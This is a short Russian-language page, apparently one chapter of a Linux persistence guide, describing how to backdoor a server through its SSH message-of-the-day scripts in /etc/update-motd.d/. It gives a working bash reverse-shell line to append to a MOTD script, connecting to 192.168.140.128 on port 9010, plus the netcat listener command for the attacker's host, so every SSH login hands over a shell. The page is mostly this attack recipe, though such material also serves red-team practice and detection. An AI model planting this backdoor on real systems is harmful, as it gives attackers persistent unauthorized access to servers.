08 - MOTD

MODT - оно же "сообщение дня" , это сообщение получают пользователи которые подключились по SSH (если нет яявного запрета в конфигурации/etc/ssh/sshd) Настрокай производится в каталоге /etc/update-motd.d/ В этом каталоге ищем приветственный файл, это может быть 00-header или 10-uname и просто последней строкой будем вызыват reverse shell 

// Добавляем в конец файла вызов шелла
/bin/bash -i >& /dev/tcp/192.168.140.128/9010 0>&1
// На хосте атакующего запускам netcat 
nc -lvp 9010

Теперь когда кто то подключиться к серверу по SSH, мы получим шелл.

Previous07 - rc.localNext09 - APT

Last updated